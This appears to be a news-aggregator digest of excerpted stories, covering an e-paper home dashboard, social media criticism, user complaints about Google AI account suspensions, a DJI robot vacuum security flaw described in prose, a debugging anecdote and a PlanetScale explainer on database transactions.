10 interesting stories served every morning and every evening.




1 1,048 shares, 77 trendiness

How I built Timeframe, our family e-paper dashboard

TL;DR: Over the past decade, I’ve worked to build the per­fect fam­ily dash­board sys­tem for our home, called Timeframe. Combining cal­en­dar, weather, and smart home data, it’s be­come an im­por­tant part of our daily lives.

When Caitlin and I got mar­ried a decade ago, we set an in­ten­tion to have a healthy re­la­tion­ship with tech­nol­ogy in our home. We kept our bed­room free of any screens, charg­ing our de­vices else­where overnight. But we missed our cal­en­dar and weather apps.

So I set out to build a so­lu­tion to our prob­lem. First, I con­structed a Magic Mirror us­ing an off-the-shelf med­i­cine cab­i­net and LCD dis­play with its frame re­moved. It showed the cal­en­dar and weather data we needed:

But it was hard to read the text, es­pe­cially dur­ing the day as we get sig­nif­i­cant nat­ural light in Colorado. At night, it glowed like any back­lit dis­play, stick­ing out sorely in our liv­ing space.

I then spent about a year ex­per­i­ment­ing with var­i­ous jail­bro­ken Kindle de­vices, even­tu­ally land­ing on de­sign with cal­en­dar and weather data on a pair of screens. The Kindles took a few sec­onds to re­fresh and flash the screen to re­set the ink pix­els, so they only up­dated every half hour. I de­signed wood en­clo­sures and laser-cut them at the lo­cal li­brary mak­er­space:

Software-wise, I built a Ruby on Rails app for fetch­ing the nec­es­sary data from Google Calendar and Dark Sky. The Kindles woke up on a sched­ule, load­ing a URL in the app that ren­dered a PNG us­ing IMGKit. The pro­to­type proved e-pa­per was the right so­lu­tion: it was un­ob­tru­sive re­gard­less of light­ing:

The Kindles were a hack, re­quir­ing con­stant tin­ker­ing to keep them work­ing. It was time for a more re­li­able so­lu­tion. I tried an OLED screen to see if the lack of a global back­light would be less dis­tract­ing, but it was­n’t much bet­ter than the Magic Mirror:

So it was back to e-pa­per. I found a sys­tem of dis­plays from Visionect, which came in 6”/10”/13”/32” sizes and could up­date every ten min­utes for 2-3 months on a sin­gle charge:

The 32” screen used an out­dated lower-con­trast panel and its res­o­lu­tion was too low to ren­der text smoothly. The smaller sizes used a con­trasty, high-PPI panel. I ended up us­ing a com­bi­na­tion of them around the house: a 6” in the mud­room for the weather, a 13” (with its built-in mag­netic back­ing) in the kitchen at­tached to the side of the fridge, and a 10” in the bed­room.

The Visionect dis­plays re­quired run­ning cus­tom closed-source soft­ware, ei­ther as a SaaS or lo­cally with Docker. I opted for a lo­cal in­stal­la­tion on the Raspberry Pi al­ready run­ning the Rails back­end. I had my best re­sults push­ing im­ages to the Visionect dis­plays every five min­utes in a re­cur­ring back­ground job. It used IMGKit to gen­er­ate a PNG and send it to the Visionect API, logic I ex­tracted into vi­sionect-ruby. This setup proved to be in­cred­i­bly re­li­able, with­out a sin­gle fail­ure for months at a time.

Visiting friends of­ten asked how they could have a sim­i­lar sys­tem in their home. Three years af­ter the ini­tial pro­to­type, I did my first mar­ket test with a po­ten­tial cus­tomer. At their re­quest, I ex­per­i­mented with dif­fer­ent for­mats, in­clud­ing a month view on the 13” screen:

Unfortunately, the cus­tomer did­n’t see enough value to jus­tify the $1000 price tag (in 2019!) for the 13” de­vice, let alone any­thing I’d charge for a sub­scrip­tion ser­vice. At around the same time, Visionect started charg­ing a $7/mo per-de­vice fee to run their back­end soft­ware on premises with Docker, af­ter years of it be­ing free to use. I’d have needed to charge $10/month, if not more, for a sin­gle screen!

In late 2021, the Marshall Fire de­stroyed our home along with ~1,000 oth­ers. Our home­own­er’s in­sur­ance gave us two years to re­build, so we set off to re­design our home from the ground up.

Around the same time, Boox re­leased the 25.3” Mira Pro, the first high-res­o­lu­tion op­tion for large e-pa­per screens. Best of all, it could up­date in re­al­time! Unlike the Visionect de­vices, it was just a dis­play with an HDMI port and needed to be plugged into power. A quick pro­to­type pow­ered by an old Mac Mini made it im­me­di­ately ob­vi­ous that it was a huge step for­ward in ca­pa­bil­ity. The larger screen al­lowed for sig­nif­i­cantly more in­for­ma­tion to be dis­played:

But the most com­pelling in­no­va­tion was hav­ing the screen up­date in re­al­time. I added a clock, the cur­rent song play­ing on our Sonos sys­tem (using jishi/​node-sonos-http-api) and the next-hour pre­cip­i­ta­tion fore­cast from Dark Sky:

The work­ing pro­to­type was enough to con­vince me to build a place for it in the new house. We de­signed a phone nook” on our main floor with an art light for the dis­play:

We also ran power to two more lo­ca­tions for 13” Visionect dis­plays, one in our bed­room and one by the door to our garage:

The real-time re­quire­ments of the Mira Pro im­me­di­ately sur­faced per­for­mance and com­plex­ity is­sues in the back­end, prompt­ing an al­most com­plete rewrite.

While the Visionect sys­tem worked just fine with mul­ti­ple-sec­ond re­sponse times, switch­ing to long-polling every two sec­onds put a ceil­ing on how slow re­sponse times could be. To start, I moved away from gen­er­at­ing im­ages. The Visionect folks added the abil­ity to ren­der a URL di­rectly in the back­end, free­ing up re­sources to serve the long-polling re­quests.

Most sig­nif­i­cantly, I started mi­grat­ing to­wards Home Assistant (HA) as the pri­mary data source. HA al­ready had in­te­gra­tions for Google Calendar, Dark Sky (now Apple Weather), and Sonos, en­abling me to re­move over half of the code in the Timeframe code­base! I ended up land­ing a PR to Home Assistant to al­low for the cal­en­dar be­hav­ior I needed, and will prob­a­bly need to write a cou­ple more be­fore HA can be the sole data source.

With less data-fetch­ing logic, I was able to re­move both the data­base and Redis from the Rails ap­pli­ca­tion, a mas­sive re­duc­tion in com­plex­ity. I now run the back­ground tasks with Rufus Scheduler and save data fetch­ing re­sults with the Rails file store cache back­end.

In ad­di­tion to data re­trieval, I’ve also worked to move as much of the ap­pli­ca­tion logic into Home Assistant. I now au­to­mat­i­cally dis­play the sta­tus of any sen­sor that be­gins with sen­sor.time­frame, us­ing a sim­ple ICON,Label CSV for­mat.

For ex­am­ple, the other day I wanted to have a re­minder to start or sched­ule our dish­washer af­ter 8pm if it was­n’t set to run. It took me about a minute to write a tem­plate sen­sor us­ing the power level from the out­let:

{% if states(‘sen­sor.kitchen_dish­wash­er_switched_out­let_pow­er’)|float < 2 and now().hour > 19 %}

uten­sils,Run the dish­washer!

{% en­dif %}

In the month since adding the helper, it re­minded me twice when I’d have oth­er­wise for­got­ten. And I did­n’t have to com­mit or de­ploy any code!

Since mov­ing into our new home, we’ve come to rely on the real-time func­tion­al­ity much more sig­nif­i­cantly. Effectively, we’ve turned the top-left cor­ner of the dis­plays into a sta­tus in­di­ca­tor for the house. For ex­am­ple, it shows what doors are open/​un­locked:

Or whether the laun­dry is done:

It has a pow­er­ful func­tion: if the sta­tus on the dis­play is blank, the house is in a healthy” state and does not need any at­ten­tion. This ap­proach of only show­ing what in­for­ma­tion is rel­e­vant in a given mo­ment flies right in the face of how most smart homes ap­proach com­mu­ni­cat­ing their sta­tus:

The sin­gle sta­tus in­di­ca­tor re­moves the need to scan an en­tire screen. This change in ap­proach is pos­si­ble be­cause of one key dif­fer­ence: we have sep­a­rated the con­trol of our de­vices from the dis­play of their sta­tus.

I con­tinue to re­ceive sig­nif­i­cant in­ter­est in the pro­ject and re­main fo­cused on bring­ing it to mar­ket. A few key is­sues re­main:

While I have made sig­nif­i­cant progress in han­dling run­time er­rors grace­fully, I have plenty to learn about cre­at­ing em­bed­ded sys­tems that do not need main­te­nance.

There are still sev­eral data sources I fetch di­rectly out­side of Home Assistant. Once HA is the sole source of data, I’ll be able to have Timeframe be a Home Assistant App, mak­ing it sig­nif­i­cantly eas­ier to dis­trib­ute.

The cur­rent hard­ware setup is not ready for adop­tion by the av­er­age con­sumer. The 25” Boox dis­play is ex­cel­lent but costs about $2000! It also does­n’t in­clude the hard­ware needed to drive the dis­play. There are a cou­ple of po­ten­tial op­tions to con­sider, such as Android-powered de­vices from Boox and Philips or low-cost op­tions from TRMNL.

Building Timeframe con­tin­ues to be a pas­sion of mine. While my day job has me build­ing soft­ware for over a hun­dred mil­lion peo­ple, it’s re­fresh­ing to work on a pro­ject that im­proves my fam­i­ly’s daily life.

...

Read the original on hawksley.org »

2 601 shares, 29 trendiness

Attention Media ≠ Social Networks

When web-based so­cial net­works started flour­ish­ing nearly two decades ago, they were gen­uinely so­cial net­works. You would sign up for a pop­u­lar ser­vice, fol­low peo­ple you knew or liked and read up­dates from them. When you posted some­thing, your fol­low­ers would re­ceive your up­dates as well. Notifications were gen­uine. The lit­tle icons in the top bar would light up be­cause some­one had sent you a di­rect mes­sage or en­gaged with some­thing you had posted. There was also, at the be­gin­ning of this mil­len­nium, a gen­eral sense of hope and op­ti­mism around tech­nol­ogy, com­put­ers and the Internet. Social net­work­ing plat­forms were one of the ser­vices that were part of what was called Web 2.0, a term used for web­sites built around user par­tic­i­pa­tion and in­ter­ac­tion. It felt as though the in­for­ma­tion su­per­high­way was fi­nally reach­ing its po­ten­tial. But some­time be­tween 2012 and 2016, things took a turn for the worse.

First came the in­fa­mous in­fi­nite scroll. I re­mem­ber feel­ing un­easy the first time a web page no longer had a bot­tom. Logically, I knew very well that every­thing a browser dis­plays is a vir­tual con­struct. There is no phys­i­cal page. It is just pix­els pre­tend­ing to be one. Still, my brain had learned to treat web pages as ob­jects with a be­gin­ning and an end. The sud­den dis­ap­pear­ance of that end dis­turbed my sense of ease.

Then came the bo­gus no­ti­fi­ca­tions. What had once been mean­ing­ful sig­nals turned into ar­bi­trary prompts. Someone you fol­lowed had posted some­thing un­re­mark­able and the plat­form would sur­face it as a no­ti­fi­ca­tion any­way. It did­n’t mat­ter whether the no­ti­fi­ca­tion was rel­e­vant to me. The no­ti­fi­ca­tion sys­tem stopped serv­ing me and started serv­ing it­self. It felt like a vi­o­la­tion of an un­spo­ken agree­ment be­tween users and ser­vices. Despite all that, these plat­forms still re­mained so­cial in some di­luted sense. Yes, the no­ti­fi­ca­tions were ma­nip­u­la­tive, but they were at least about peo­ple I ac­tu­ally knew or had cho­sen to fol­low. That, too, would change.

Over time, my time­line con­tained fewer and fewer posts from friends and more and more con­tent from ran­dom strangers. Using these ser­vices be­gan to feel like stand­ing in front of a blar­ing loud­speaker, broad­cast­ing frag­ments of con­ver­sa­tions from all over the world di­rectly in my face. That was when I gave up on these ser­vices. There was noth­ing so­cial about them any­more. They had be­come at­ten­tion me­dia. My at­ten­tion is pre­cious to me. I can­not spend it mind­lessly scrolling through videos that have nei­ther rel­e­vance nor sub­stance.

But where one av­enue dis­ap­peared, an­other emerged. A few years ago, I stum­bled upon Mastodon and it re­minded me of the early days of Twitter. Back in 2006, I fol­lowed a small num­ber of folks of the nerd va­ri­ety on Twitter and re­ceived gen­uinely in­ter­est­ing up­dates from them. But when I log into the ru­ins of those older plat­forms now, all I see are ran­dom videos pre­sented to me for rea­sons I can nei­ther in­fer nor care about. Mastodon, by con­trast, still feels like so­cial net­work­ing in the orig­i­nal sense. I fol­low a small num­ber of peo­ple I gen­uinely find in­ter­est­ing and I re­ceive their up­dates and only their up­dates. What I see is the re­sult of my own choices rather than a sys­tem try­ing to cap­ture and mon­e­tise my at­ten­tion. There are no bo­gus no­ti­fi­ca­tions. The time­line feels calm and pre­dictable. If there are no new up­dates from peo­ple I fol­low, there is noth­ing to see. It feels closer to how so­cial net­works used to work orig­i­nally. I hope it stays that way.

...

Read the original on susam.net »

3 583 shares, 62 trendiness

Account Restricted Without WARNING– Google AI Ultra / OAuth via OpenClaw

I’m seek­ing as­sis­tance re­gard­ing a sud­den re­stric­tion on my Google AI Ultra ac­count that has per­sisted for three days. I re­ceived no prior warn­ings or no­ti­fi­ca­tions re­gard­ing a po­ten­tial vi­o­la­tion.

The only re­cent change in my work­flow was con­nect­ing Gemini mod­els via OpenClaw OAuth. If third-party in­te­gra­tions are the is­sue, I would ex­pect the plat­form to block the in­te­gra­tion rather than re­strict a paid ac­count ($249/mo) with­out com­mu­ni­ca­tion.

I have al­ready emailed sup­port but haven’t re­ceived a re­sponse. Additionally, I found that ac­cess­ing GCC sup­port re­quires an ad­di­tional fee, which seems un­rea­son­able given the ex­ist­ing sub­scrip­tion cost. I WOULD LOVE TO GET THIS RESOLVED!!

Thank you for bring­ing this to our at­ten­tion. We have shared the is­sue to our in­ter­nal teams for a thor­ough in­ves­ti­ga­tion.

To en­sure our en­gi­neer­ing team can in­ves­ti­gate and re­solve these is­sues ef­fec­tively, we highly rec­om­mend fil­ing bug re­ports di­rectly through the Antigravity in-app feed­back tool. You can do this by nav­i­gat­ing to the top-right cor­ner of the in­ter­face, click­ing the Feedback icon, and se­lect­ing Report Issue.

Sir, I am logged out of my ac­count and I can’t even get into the app!! This is so frus­trat­ing..

[UPDATE] Day 4, and still to­tal si­lence from sup­port. I’ve re­ceived zero ac­knowl­edge­ment through of­fi­cial chan­nels or the feed­back cen­ter. I am now in the process of mov­ing all my data and sub­scrip­tions off Google. It’s stag­ger­ing that an or­ga­ni­za­tion of this scale can be this un­re­spon­sive to a wide­spread is­sue.

I con­tacted the Google Cloud Support via GCP Account Suspension Inquiry”. They told me to con­tact Google One Support, be­cause the er­ror is tied to the per­sonal sub­scrip­tion, not to a Google Cloud pro­ject billing ac­count”. Google One sup­port told me to con­tact Google Cloud sup­port

From emails gemini-code-assist-user-feedback” or antigravity-support” still no an­swer.

And it hap­pens af­ter some days af­ter I bought the sub­scrip­tion for an year…

any up­date? please tell us how did u solved it!

Nope, still re­stricted, tried to es­ca­late by Google One, But they can’t help with the prob­lem ei­ther…

Same is­sue and same sen­ti­ment and I can­celled and re­moved billing for all Google prod­ucts. Absolutely shame­ful treat­ment of pay­ing cus­tomers. I emailed each of the con­tact emails for Antigravity and gem­ini-code-as­sist with­out re­ply. Unfortunately I pre­paid for a year so it looks like I’ll have to sue a tril­lion-dol­lar com­pany just to get the measly fee?

I have tried to con­tact every­one I could. And you all know how dis­gust­ing their sup­ports are. I am to­tally dis­ap­pointed with their cus­tomer ser­vice. After 3 weeks wait­ing, the re­sult is that they can­not re­store my ac­count. I guess it is time to move on to Codex or Claude Code. Below is their re­ply af­ter full in­ves­ti­ga­tion by the in­ter­nal team“:

Thank you for your con­tin­ued pa­tience as we have thor­oughly in­ves­ti­gated your ac­count ac­cess is­sue. Please be as­sured that we con­ducted a com­pre­hen­sive in­ves­ti­ga­tion, ex­plor­ing every pos­si­ble av­enue to re­store your ac­cess.

Our prod­uct en­gi­neer­ing team has con­firmed that your ac­count was sus­pended from us­ing our Antigravity ser­vice. This sus­pen­sion af­fects your ac­cess to the Gemini CLI and any other ser­vice that uses the Cloud Code Private API.

Our in­ves­ti­ga­tion specif­i­cally con­firmed that the use of your cre­den­tials within the third-party tool open claw” for test­ing pur­poses con­sti­tutes a vi­o­la­tion of the Google Terms of Service [1]. This is due to the use of Antigravity servers to power a non-Anti­grav­ity prod­uct.

I must be trans­par­ent and in­form you that, in ac­cor­dance with Google’s pol­icy, this sit­u­a­tion falls un­der a zero tol­er­ance pol­icy, and we are un­able to re­verse the sus­pen­sion. I am truly sorry to share this dif­fi­cult news with you.”

Ok so ba­si­caly, there’s no way we can re­store our ac­counts to use Antigravity any­more yeah? this is un­ex­pected, but un­til we can fig­ure out how to re­solve this is­sue, I’ll just sub­scribed us­ing dif­fer­ent ac­count

I’m in the same sit­u­a­tion…

Hi @Abhijit_Pramanik , could you please pro­vide some help? This si­lence is un­bear­able.

Gemini Disabled on Antigravity IDE, How to Restore Access?

I’m in con­tact with Google One but their ac­tions are no help at all, for al­most a week they haven’t done any­thing, they only asked for screen­shots/​record­ings of the lo­gin at­tempt.

Why is there si­lence from Google? What is the user sup­posed to do? Create a new ac­count and buy a new PRO/ULTRA, or what? Any in­for­ma­tion at all?!

I’ve got ban and the only dif­fer­ence from vanilla IDE ex­pe­ri­ence was anti­grav­ity-cock­pit ex­ten­sion. No re­ply to my ap­peal email last 12 hours.

ost. I WOULD LOVE TO GET THIS RESOLVED!!

I’m sub­scrib­ing the AI Pro and just in­te­grated Gemini to OpenCode yes­ter­day. After a just day use, my ac­count is sus­pended with­out any warn­ings. Simply the API re­turns 403 er­ror to my OpenCode and Gemini CLI like this:

Failed to lo­gin. Message: This ser­vice has been dis­abled in this ac­count for vi­o­la­tion of Terms of Service. If you be­lieve this is an er­ror, con­tact gem­ini-code-as­sist-user-feed­back@google.com.

I emailed to the con­tact this morn­ing but did­n’t get any re­sponse yet.

If this is in­deed the case, I find it ut­terly ab­surd. It seems Google’s re­sponse is woe­fully in­ad­e­quate; I should ex­plore Claude or other al­ter­na­tives.

Quick up­date for every­one stuck in this 403 loop: I just spent the last 8 days fight­ing through Tier 1 sup­port. Google One sup­port fi­nally ad­mit­ted on record it’s a known WAF bug’, but then lit­er­ally routed me to Android App Developer sup­port be­cause they have no back­end ac­cess to fix it.

The en­tire sup­port flow­chart is com­pletely bro­ken, and they are still billing us $250/mo for bricked ac­counts. I just doc­u­mented the en­tire Kafkaesque sup­port loop over on the google_anti­grav­ity sub­red­dit. If you are stuck in this same Catch-22, go search for that post over there and share your Trajectory IDs in the com­ments so we can get some ac­tual en­gi­neer­ing eyes on this mass ban wave.

Hi @K8L, just wanted to share some con­text re­gard­ing this sit­u­a­tion as I see you are wait­ing for a re­sponse.

Yesterday, Abhijit ac­tu­ally posted a brief state­ment ac­knowl­edg­ing these 403 ToS is­sues, not­ing that the in­ter­nal team was prioritizing a res­o­lu­tion.’ However, the mes­sage was deleted just a few min­utes later.

Hoping for some trans­parency, I left a sin­gle, po­lite com­ment ask­ing for clar­i­fi­ca­tion on why the up­date was re­moved. Surprisingly, my fo­rum ac­count was banned shortly af­ter post­ing that ques­tion.

Currently, there seems to be no of­fi­cial com­mu­ni­ca­tion re­gard­ing these 403 er­rors, al­though we can see ac­tive replies be­ing made to other un­re­lated threads on the fo­rum.

This sit­u­a­tion is quite con­cern­ing for us as de­vel­op­ers. The au­to­mated sys­tem is still trig­ger­ing these mass bans daily dur­ing fixed time win­dows, with­out any warn­ing and seem­ingly with­out a re­view of the cur­rent process.

Fingers crossed this mes­sage does­n’t get taken down and my ac­count sur­vives long enough for you guys to read it, haha.

Facing this is­sue too, I wrote an email to gem­ini-code-as­sist-user-feed­back@google.com eight days ago”, and still got no re­sponse to­day. So dis­ap­pointed

My ac­count (pro) was also bricked for call­ing Gemini model from pi har­ness two times. No re­sponse from sup­port and it’s been four days.

...

Read the original on discuss.ai.google.dev »

4 402 shares, 32 trendiness

Short videos. Your community. Your rules.

All the fun of short-form video, none of the cor­po­rate con­trol.

Loops is fed­er­ated, open-source, and de­signed to give power back to cre­ators and com­mu­ni­ties across the so­cial web. Build your com­mu­nity on a plat­form that can’t lock you in.

...

Read the original on joinloops.org »

5 283 shares, 15 trendiness

Man accidentally gains control of 7,000 robot vacuums

A soft­ware en­gi­neer’s earnest ef­fort to steer his new DJI ro­bot vac­uum with a video game con­troller in­ad­ver­tently granted him a sneak peak into thou­sands of peo­ple’s homes.

While build­ing his own re­mote-con­trol app, Sammy Azdoufal re­port­edly used an AI cod­ing as­sis­tant to help re­verse-en­gi­neer how the ro­bot com­mu­ni­cated with DJIs re­mote cloud servers. But he soon dis­cov­ered that the same cre­den­tials that al­lowed him to see and con­trol his own de­vice also pro­vided ac­cess to live cam­era feeds, mi­cro­phone au­dio, maps, and sta­tus data from nearly 7,000 other vac­u­ums across 24 coun­tries. The back­end se­cu­rity bug ef­fec­tively ex­posed an army of in­ter­net-con­nected ro­bots that, in the wrong hands, could have turned into sur­veil­lance tools, all with­out their own­ers ever know­ing.

Luckily, Azdoufal chose not to ex­ploit that. Instead, he shared his find­ings with The Verge, which quickly con­tacted DJI to re­port the flaw. While DJI tells Popular Science the is­sue has been resolved,” the dra­matic episode un­der­scores warn­ings from cy­ber­se­cu­rity ex­perts who have long-warned that in­ter­net-con­nected ro­bots and other smart home de­vices pre­sent at­trac­tive tar­gets for hack­ers.

As more house­holds adopt home ro­bots, (including newer, more in­ter­ac­tive hu­manoid mod­els) sim­i­lar vul­ner­a­bil­i­ties could be­come harder to de­tect. AI-powered cod­ing tools, which make it eas­ier for peo­ple with less tech­ni­cal knowl­edge to ex­ploit soft­ware flaws, po­ten­tially risk am­pli­fy­ing those wor­ries even fur­ther.

The ro­bot in ques­tion is the DJI Romo, an au­tonomous home vac­uum that first launched in China last year and is cur­rently ex­pand­ing to other coun­tries. It re­tails for around $2,000 and is roughly the size of a large ter­rier or a small fridge when docked at its base sta­tion. Like other ro­bot vac­u­ums, it’s equipped with a range of sen­sors that help it nav­i­gate its sur­round­ings and de­tect ob­sta­cles. Users can sched­ule and con­trol it via an app, but it is de­signed to spend most of its time clean­ing and mop­ping au­tonomously.

In or­der for the Romo, or re­ally any mod­ern au­tonomous vac­uum, to func­tion it needs to con­stantly col­lect vi­sual data from the build­ing it is op­er­at­ing in. It also needs to un­der­stand spe­cific de­tails about what makes, say, a kitchen dif­fer­ent from a bed­room, so it can dis­tin­guish be­tween the two. Some of that sen­sor data is stored re­motely on DJIs servers rather than on the de­vice it­self. For Azdoufal’s DIY con­troller idea to work, he would need a way for his app to com­mu­ni­cate with DJIs servers and ex­tract a se­cu­rity to­ken that proves he is the owner of the ro­bot.

Rather than just ver­i­fy­ing a sin­gle to­ken, the servers granted ac­cess for a small army of ro­bots, es­sen­tially treat­ing him as their re­spec­tive owner. That slip-up meant Azdoufal could tap into their real-time cam­era feeds and ac­ti­vate their mi­cro­phones. He also claims he could com­pile 2D floor plans of the homes the ro­bots were op­er­at­ing in. A quick look at the ro­bots’ IP ad­dresses also re­vealed their ap­prox­i­mate lo­ca­tions. None of this, Azdoufal in­sists, amounts to hacking” on his part. He sim­ply stum­bled upon a ma­jor se­cu­rity is­sue.

DJI iden­ti­fied a vul­ner­a­bil­ity af­fect­ing DJI Home through in­ter­nal re­view in late January and ini­ti­ated re­me­di­a­tion im­me­di­ately,” DJI told Popular Science. The is­sue was ad­dressed through two up­dates, with an ini­tial patch de­ployed on February 8 and a fol­low-up up­date com­pleted on February 10. The fix was de­ployed au­to­mat­i­cally, and no user ac­tion is re­quired.”

The com­pany went on to say its plans to continue to im­ple­ment ad­di­tional se­cu­rity en­hance­ments” but did not spec­ify what those may en­tail.

The DJI se­cu­rity con­cerns come amid a pe­riod of grow­ing un­ease gen­er­ally about the sur­veil­lance ca­pa­bil­i­ties of smart home tech­nol­ogy. Earlier this month, Ring cam­era own­ers flooded so­cial me­dia af­ter a con­tro­ver­sial ad­ver­tise­ment for the com­pa­ny’s pet-find­ing search party” fea­ture was in­ter­preted by some as a Trojan horse for broader mon­i­tor­ing. Around the same time, re­ports that Google was able to re­trieve video footage from a Nest Doorbell cam­era to as­sist in an ab­duc­tion in­ves­ti­ga­tion (despite ear­lier in­di­ca­tions that the footage had been deleted) reignited de­bate over how much con­trol con­sumers truly have over their sen­si­tive data.

On top of that, law­mak­ers from both po­lit­i­cal par­ties in the US have spent years warn­ing that DJI and other Chinese tech man­u­fac­tur­ers pose a unique se­cu­rity threat. The ev­i­dence for those claims are murky, it’s nonethe­less helped jus­tify the ban­ning of cer­tain Chinese-made prod­ucts.

The irony of many ro­bot vac­u­ums and other smart home de­vices is that, as a cat­e­gory, they have a long his­tory of ques­tion­able se­cu­rity prac­tices, de­spite the fact that they op­er­ate in some of our most pri­vate spaces. All signs sug­gest that the av­er­age per­son will soon wel­come more cam­eras and mi­cro­phones into their homes, not fewer. As of 2020, mar­ket re­search firm Parks Associates es­ti­mates that 54 mil­lion U. S. house­holds had at least one smart home de­vice in­stalled. Other sur­veys show that those who al­ready have one of­ten want more.

The spe­cific types of de­vices en­ter­ing homes are also be­com­ing more so­phis­ti­cated. Though still early, Tesla, Figure, and other com­pa­nies are rac­ing to build hu­man-like au­tonomous ro­bots that can live in a home and per­form chores. A com­pany called 1X is al­ready re­tail­ing one of these hu­manoids, claim­ing it can clean dishes and crack wal­nuts—al­beit of­ten with some help from a hu­man. Eventually though, for any of these at-home ro­bot ser­vants to func­tion ef­fec­tively, they will need un­prece­dented ac­cess to the in­ti­mate de­tails of their own­ers’ homes. For a stalker or hacker, that rep­re­sents a po­ten­tial gold­mine.

True to his word though, Azdoufal found him­self wrapped up in this mess even though all he wanted to do was drive his ro­bot around with a joy­stick. On that front, mis­sion ac­com­plished.

...

Read the original on www.popsci.com »

6 282 shares, 13 trendiness

Iran students resume anti-government protests

I don’t want to use the word frustrated,’ be­cause he un­der­stands he has plenty of al­ter­na­tives, but he’s cu­ri­ous as to why they haven’t… I don’t want to use the word capitulated,’ but why they haven’t ca­pit­u­lated,” he said.

...

Read the original on www.bbc.com »

7 238 shares, 13 trendiness

Fix your tools

Last week I had to di­ag­nose a bug in an open source li­brary I main­tain. The is­sue was gnarly enough that I could­n’t find it right away, but then I thought: if I set a break­point here and fire up the de­bug­ger, I will likely find the root cause very soon… and then pro­ceed to mer­ci­lessly de­stroy it!

So I rolled up my sleeves, set the break­point, fired up the de­bug­ger, and… saw the pro­gram run to com­ple­tion with­out in­ter­rup­tions what­so­ever. My break­point had been ig­nored, even though I knew for cer­tain that the line of code in ques­tion must have been ex­e­cuted (I dou­ble-checked just to be sure).

Since I was in problem solv­ing mode”, I ig­nored the de­bug­ger is­sue and started think­ing of other ap­proaches to di­ag­nos­ing it. Prey to my tun­nel vi­sion, I mod­i­fied the code to log po­ten­tially in­ter­est­ing data, but it did­n’t yield the in­sights I was hop­ing for. How frus­trat­ing!

My fin­ger­tips itched to write even more trou­bleshoot­ing code when it sud­denly dawned on me: just fix the darn de­bug­ger al­ready! Sure, it might feel slower, but it will give you the abil­ity to see what you need to see, and then ac­tu­ally solve the prob­lem.

So I fixed the de­bug­ger (it turned out to be a one-line con­fig­u­ra­tion change), ob­served the pro­gram’s be­hav­ior in more de­tail, and used that knowl­edge to solve the is­sue.

What a para­dox, I re­al­ized af­ter­wards. The very de­sire to fix the bug pre­vented me from see­ing I had to fix the tool first, and made me less ef­fec­tive in my bug hunt. This blog post is a re­minder to my­self, and to every bug-hun­gry pro­gram­mer out there: fix your tools! They will do won­ders for you.

...

Read the original on ochagavia.nl »

8 230 shares, 11 trendiness

Database Transactions — PlanetScale

PlanetScale Postgres is the fastest way to run Postgres in the cloud. Plans start at just $5 per month.

Transactions are fun­da­men­tal to how SQL data­bases work. Trillions of trans­ac­tions ex­e­cute every sin­gle day, across the thou­sands of ap­pli­ca­tions that rely on SQL data­bases.

A trans­ac­tion is a se­quence of ac­tions that we want to per­form on a data­base as a sin­gle, atomic op­er­a­tion. An in­di­vid­ual trans­ac­tion can in­clude a com­bi­na­tion of read­ing, cre­at­ing, up­dat­ing, and re­mov­ing data.

In MySQL and Postgres, we be­gin a new trans­ac­tion with be­gin; and end it with com­mit;. Between these two com­mands, any num­ber of SQL queries that search and ma­nip­u­late data can be ex­e­cuted.

The ex­am­ple above shows a trans­ac­tion be­gin, three query ex­e­cu­tions, then the com­mit. You can hit the ↻ but­ton to re­play the se­quence at any time. The act of com­mit­ting is what atom­i­cally ap­plies all of the changes made by those SQL state­ments.

There are some sit­u­a­tions where trans­ac­tions do not com­mit. This is some­times due to un­ex­pected events in the phys­i­cal world, like a hard drive fail­ure or power out­age. Databases like MySQL and Postgres are de­signed to cor­rectly han­dle many of these un­ex­pected sce­nar­ios, us­ing dis­as­ter re­cov­ery tech­niques. Postgres, for ex­am­ple, han­dles this via its write-ahead log mech­a­nism (WAL).

There are also times when we want to in­ten­tion­ally undo a par­tially-ex­e­cuted trans­ac­tion. This hap­pens when mid­way through a trans­ac­tion, we en­counter miss­ing / un­ex­pected data or get a can­cel­la­tion re­quest from a client. For this, data­bases sup­port the roll­back; com­mand.

In the ex­am­ple above, the trans­ac­tion made sev­eral mod­i­fi­ca­tions to the data­base, but those changes were iso­lated from all other on­go­ing queries and trans­ac­tions. Before the trans­ac­tion com­mit­ted, we de­cided to roll­back, un­do­ing all changes and leav­ing the data­base un­al­tered by this trans­ac­tion.

By the way, you can use the menu be­low to change the speed of all the ses­sions and an­i­ma­tions in this ar­ti­cle. If the ones above were go­ing too fast or too slow for your lik­ing, fix that here!

A key rea­son trans­ac­tions are use­ful is to al­low ex­e­cu­tion of many queries si­mul­ta­ne­ously with­out them in­ter­fer­ing with each other. Below you can see a sce­nario with two dis­tinct ses­sions con­nected to the same data­base. Session A starts a trans­ac­tion, se­lects data, up­dates it, se­lects again, and then com­mits. Session B se­lects that same data twice dur­ing a trans­ac­tion and again af­ter both of the trans­ac­tions have com­pleted.

Session B does not see the name up­date from ben to joe un­til af­ter Session A com­mits the trans­ac­tion.

Consider the same se­quence of events, ex­cept in­stead of com­mit­ing the trans­ac­tion in Session A, we roll­back.

The sec­ond ses­sion never sees the ef­fect of any changes made by the first, due to the roll­back. This is a nice segue into an­other im­por­tant con­cept in trans­ac­tions: Consistent reads.

During a trans­ac­tion’s ex­e­cu­tion, we would like it to have a con­sis­tent view of the data­base. This means that even if an­other trans­ac­tion si­mul­ta­ne­ously adds, re­moves, or up­dates in­for­ma­tion, our trans­ac­tion should get its own iso­lated view of the data, un­af­fected by these ex­ter­nal changes, un­til the trans­ac­tion com­mits.

MySQL and Postgres both sup­port this ca­pa­bil­ity when op­er­at­ing in REPEATABLE READ mode (plus all stricter modes, too). However, they each take dif­fer­ent ap­proaches to achiev­ing this same goal.

Postgres han­dles this with multi-ver­sion­ing of rows. Every time a row is in­serted or up­dated, it cre­ates a new row along with meta­data to keep track of which trans­ac­tions can ac­cess the new ver­sion. MySQL han­dles this with an undo log. Changes to rows im­me­di­ately over­write old ver­sions, but a record of mod­i­fi­ca­tions is main­tained in a log file, in case they need to be re­con­structed.

Let’s take a close look at each.

Below, you’ll see a sim­ple user table on the left and a se­quence of state­ments in Session A on the right. Click the play ses­sions” but­ton and watch what hap­pens as the state­ments get ex­e­cuted.

* An up­date is made to the user with ID 4, chang­ing the name from liz” to aly”. This causes a new ver­sion of the row to be cre­ated, while the other is main­tained.

* The old ver­sion of the row had its xmax set to 10 (xmax = max trans­ac­tion ID)

* The new ver­sion of the row also had its xmin set to 10 (xmin = min trans­ac­tion ID)

